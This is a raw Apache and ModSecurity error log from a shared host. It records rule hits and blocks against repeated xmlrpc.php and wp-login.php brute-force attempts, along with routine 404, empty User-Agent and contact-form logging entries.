[Tue May 26 19:30:55.253568 2026] [security2:error] [pid 58470:tid 58584] [remote 123.30.233.12:34712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnl7njVHRH3AGGvmb53AAAOXE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:30:56.003298 2026] [security2:error] [pid 58470:tid 58697] [client 91.245.236.124:13071] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmLnjVHRH3AGGvmb5_QAAAGE"]
[Tue May 26 19:30:56.003403 2026] [security2:error] [pid 58470:tid 58697] [client 91.245.236.124:13071] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmLnjVHRH3AGGvmb5_QAAAGE"]
[Tue May 26 19:30:56.677647 2026] [autoindex:error] [pid 58470:tid 58671] [client 199.45.155.108:4128] AH01276: Cannot serve directory /home2/azurm42s/public_html/erptrn.azurmediatec.com/: No matching DirectoryIndex (index.php,index.html,index.htm) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:30:56.764320 2026] [security2:error] [pid 58470:tid 58687] [client 91.245.236.124:36903] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmLnjVHRH3AGGvmb6DwAAAFc"]
[Tue May 26 19:30:56.764444 2026] [security2:error] [pid 58470:tid 58687] [client 91.245.236.124:36903] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmLnjVHRH3AGGvmb6DwAAAFc"]
[Tue May 26 19:30:56.967559 2026] [security2:error] [pid 58470:tid 58658] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnmLnjVHRH3AGGvmb6DQAAADo"]
[Tue May 26 19:30:57.548120 2026] [security2:error] [pid 58470:tid 58660] [client 91.245.236.124:48197] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmbnjVHRH3AGGvmb6JgAAADw"]
[Tue May 26 19:30:57.548220 2026] [security2:error] [pid 58470:tid 58660] [client 91.245.236.124:48197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmbnjVHRH3AGGvmb6JgAAADw"]
[Tue May 26 19:30:58.328578 2026] [security2:error] [pid 58470:tid 58644] [client 91.245.236.124:56699] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmrnjVHRH3AGGvmb6QAAAACw"]
[Tue May 26 19:30:58.328804 2026] [security2:error] [pid 58470:tid 58644] [client 91.245.236.124:56699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnmrnjVHRH3AGGvmb6QAAAACw"]
[Tue May 26 19:30:58.505802 2026] [security2:error] [pid 58470:tid 58667] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnmrnjVHRH3AGGvmb6MwAAAEM"]
[Tue May 26 19:30:59.048128 2026] [security2:error] [pid 58470:tid 58671] [client 74.125.208.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWnmrnjVHRH3AGGvmb6SgAAAEc"]
[Tue May 26 19:30:59.097406 2026] [security2:error] [pid 58470:tid 58659] [client 91.245.236.124:58497] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnm7njVHRH3AGGvmb6VgAAADs"]
[Tue May 26 19:30:59.097557 2026] [security2:error] [pid 58470:tid 58659] [client 91.245.236.124:58497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnm7njVHRH3AGGvmb6VgAAADs"]
[Tue May 26 19:30:59.722876 2026] [security2:error] [pid 58470:tid 58498] [remote 103.119.139.118:37938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.139.119.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnm7njVHRH3AGGvmb6ZgAAeBs"]
[Tue May 26 19:30:59.866999 2026] [security2:error] [pid 58470:tid 58615] [client 91.245.236.124:18477] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnm7njVHRH3AGGvmb6agAAAA8"]
[Tue May 26 19:30:59.867116 2026] [security2:error] [pid 58470:tid 58615] [client 91.245.236.124:18477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnm7njVHRH3AGGvmb6agAAAA8"]
[Tue May 26 19:31:00.517365 2026] [security2:error] [pid 58470:tid 58495] [remote 103.119.139.118:37938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.139.119.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnnLnjVHRH3AGGvmb6dwAABRg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:31:00.628815 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:35339] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnLnjVHRH3AGGvmb6fgAAAHY"]
[Tue May 26 19:31:00.628967 2026] [security2:error] [pid 58470:tid 58718] [client 91.245.236.124:35339] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnLnjVHRH3AGGvmb6fgAAAHY"]
[Tue May 26 19:31:00.985464 2026] [security2:error] [pid 58470:tid 58613] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnnLnjVHRH3AGGvmb6fAAAAA0"]
[Tue May 26 19:31:01.390134 2026] [security2:error] [pid 58470:tid 58682] [client 91.245.236.124:64939] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnbnjVHRH3AGGvmb6kgAAAFI"]
[Tue May 26 19:31:01.390259 2026] [security2:error] [pid 58470:tid 58682] [client 91.245.236.124:64939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnbnjVHRH3AGGvmb6kgAAAFI"]
[Tue May 26 19:31:01.670833 2026] [security2:error] [pid 58470:tid 58669] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnnbnjVHRH3AGGvmb6mwAAAEU"]
[Tue May 26 19:31:01.670858 2026] [security2:error] [pid 58470:tid 58669] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnnbnjVHRH3AGGvmb6mwAAAEU"]
[Tue May 26 19:31:01.671301 2026] [security2:error] [pid 58470:tid 58606] [client 65.109.156.37:53790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWnnbnjVHRH3AGGvmb6mAAAAAY"]
[Tue May 26 19:31:02.077851 2026] [security2:error] [pid 58470:tid 58644] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6qAAAACw"]
[Tue May 26 19:31:02.077879 2026] [security2:error] [pid 58470:tid 58644] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6qAAAACw"]
[Tue May 26 19:31:02.078398 2026] [security2:error] [pid 58470:tid 58632] [client 65.109.156.37:53942] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWnnrnjVHRH3AGGvmb6pgAAACA"]
[Tue May 26 19:31:02.155959 2026] [security2:error] [pid 58470:tid 58715] [client 91.245.236.124:63245] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6rQAAAHM"]
[Tue May 26 19:31:02.156079 2026] [security2:error] [pid 58470:tid 58715] [client 91.245.236.124:63245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6rQAAAHM"]
[Tue May 26 19:31:02.938498 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:45395] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6ygAAAD0"]
[Tue May 26 19:31:02.938611 2026] [security2:error] [pid 58470:tid 58661] [client 91.245.236.124:45395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnnrnjVHRH3AGGvmb6ygAAAD0"]
[Tue May 26 19:31:03.576217 2026] [security2:error] [pid 58470:tid 58612] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnn7njVHRH3AGGvmb60gAAAAw"]
[Tue May 26 19:31:03.714401 2026] [security2:error] [pid 58470:tid 58723] [client 91.245.236.124:63451] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnn7njVHRH3AGGvmb64AAAAHs"]
[Tue May 26 19:31:03.714540 2026] [security2:error] [pid 58470:tid 58723] [client 91.245.236.124:63451] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnn7njVHRH3AGGvmb64AAAAHs"]
[Tue May 26 19:31:04.473857 2026] [security2:error] [pid 58470:tid 58724] [client 91.245.236.124:38593] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnoLnjVHRH3AGGvmb68wAAAHw"]
[Tue May 26 19:31:04.473961 2026] [security2:error] [pid 58470:tid 58724] [client 91.245.236.124:38593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnoLnjVHRH3AGGvmb68wAAAHw"]
[Tue May 26 19:31:04.571470 2026] [security2:error] [pid 58470:tid 58507] [remote 18.190.7.192:50136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnoLnjVHRH3AGGvmb69AAALiQ"]
[Tue May 26 19:31:05.256504 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:29683] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnobnjVHRH3AGGvmb6_gAAAAs"]
[Tue May 26 19:31:05.256644 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:29683] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnobnjVHRH3AGGvmb6_gAAAAs"]
[Tue May 26 19:31:05.555542 2026] [security2:error] [pid 58470:tid 58595] [remote 18.190.7.192:50136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnobnjVHRH3AGGvmb7FAAAbnw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:31:05.791392 2026] [security2:error] [pid 58470:tid 58664] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnobnjVHRH3AGGvmb7CgAAAEA"]
[Tue May 26 19:31:06.023298 2026] [security2:error] [pid 58470:tid 58639] [client 91.245.236.124:62535] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnornjVHRH3AGGvmb7IQAAACc"]
[Tue May 26 19:31:06.023412 2026] [security2:error] [pid 58470:tid 58639] [client 91.245.236.124:62535] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnornjVHRH3AGGvmb7IQAAACc"]
[Tue May 26 19:31:06.454884 2026] [security2:error] [pid 58470:tid 58524] [remote 5.42.158.148:56336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWnornjVHRH3AGGvmb7IgAAdjU"]
[Tue May 26 19:31:06.491892 2026] [security2:error] [pid 58470:tid 58705] [client 184.82.168.113:38166] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnornjVHRH3AGGvmb7LAAAAGk"]
[Tue May 26 19:31:06.785515 2026] [security2:error] [pid 58470:tid 58610] [client 91.245.236.124:54037] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnornjVHRH3AGGvmb7OAAAAAo"]
[Tue May 26 19:31:06.785651 2026] [security2:error] [pid 58470:tid 58610] [client 91.245.236.124:54037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnornjVHRH3AGGvmb7OAAAAAo"]
[Tue May 26 19:31:06.786346 2026] [security2:error] [pid 58470:tid 58705] [client 184.82.168.113:38166] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnornjVHRH3AGGvmb7LAAAAGk"]
[Tue May 26 19:31:06.786404 2026] [security2:error] [pid 58470:tid 58705] [client 184.82.168.113:38166] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnornjVHRH3AGGvmb7LAAAAGk"]
[Tue May 26 19:31:07.325488 2026] [security2:error] [pid 58470:tid 58725] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnornjVHRH3AGGvmb7OwAAAH0"]
[Tue May 26 19:31:07.727944 2026] [security2:error] [pid 58470:tid 58660] [client 91.245.236.124:58877] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWno7njVHRH3AGGvmb7TwAAADw"]
[Tue May 26 19:31:07.728053 2026] [security2:error] [pid 58470:tid 58660] [client 91.245.236.124:58877] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWno7njVHRH3AGGvmb7TwAAADw"]
[Tue May 26 19:31:08.445553 2026] [security2:error] [pid 58470:tid 58674] [client 184.82.168.113:38235] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnpLnjVHRH3AGGvmb7YwAAAEo"]
[Tue May 26 19:31:08.506773 2026] [security2:error] [pid 58470:tid 58632] [client 91.245.236.124:19941] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnpLnjVHRH3AGGvmb7ZAAAACA"]
[Tue May 26 19:31:08.506942 2026] [security2:error] [pid 58470:tid 58632] [client 91.245.236.124:19941] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnpLnjVHRH3AGGvmb7ZAAAACA"]
[Tue May 26 19:31:08.537163 2026] [security2:error] [pid 58470:tid 58674] [client 184.82.168.113:38235] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahWnpLnjVHRH3AGGvmb7YwAAAEo"]
[Tue May 26 19:31:09.272954 2026] [security2:error] [pid 58470:tid 58685] [client 91.245.236.124:23367] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnpbnjVHRH3AGGvmb7eAAAAFU"]
[Tue May 26 19:31:09.273108 2026] [security2:error] [pid 58470:tid 58685] [client 91.245.236.124:23367] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnpbnjVHRH3AGGvmb7eAAAAFU"]
[Tue May 26 19:31:09.709888 2026] [ssl:error] [pid 58470:tid 58719] [client 66.132.172.107:36790] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname mail.toronto121mortgage.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 19:31:09.950736 2026] [security2:error] [pid 58470:tid 58704] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnpbnjVHRH3AGGvmb7gwAAAGg"]
[Tue May 26 19:31:10.052807 2026] [security2:error] [pid 58470:tid 58672] [client 91.245.236.124:48975] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnprnjVHRH3AGGvmb7kAAAAEg"]
[Tue May 26 19:31:10.052926 2026] [security2:error] [pid 58470:tid 58672] [client 91.245.236.124:48975] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnprnjVHRH3AGGvmb7kAAAAEg"]
[Tue May 26 19:31:10.833107 2026] [security2:error] [pid 58470:tid 58646] [client 91.245.236.124:35361] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnprnjVHRH3AGGvmb7owAAAC4"]
[Tue May 26 19:31:10.833227 2026] [security2:error] [pid 58470:tid 58646] [client 91.245.236.124:35361] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnprnjVHRH3AGGvmb7owAAAC4"]
[Tue May 26 19:31:11.300210 2026] [security2:error] [pid 58470:tid 58552] [remote 94.76.235.103:37308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWnp7njVHRH3AGGvmb7qgAAZFE"]
[Tue May 26 19:31:11.500569 2026] [security2:error] [pid 58470:tid 58666] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnp7njVHRH3AGGvmb7qQAAAEI"]
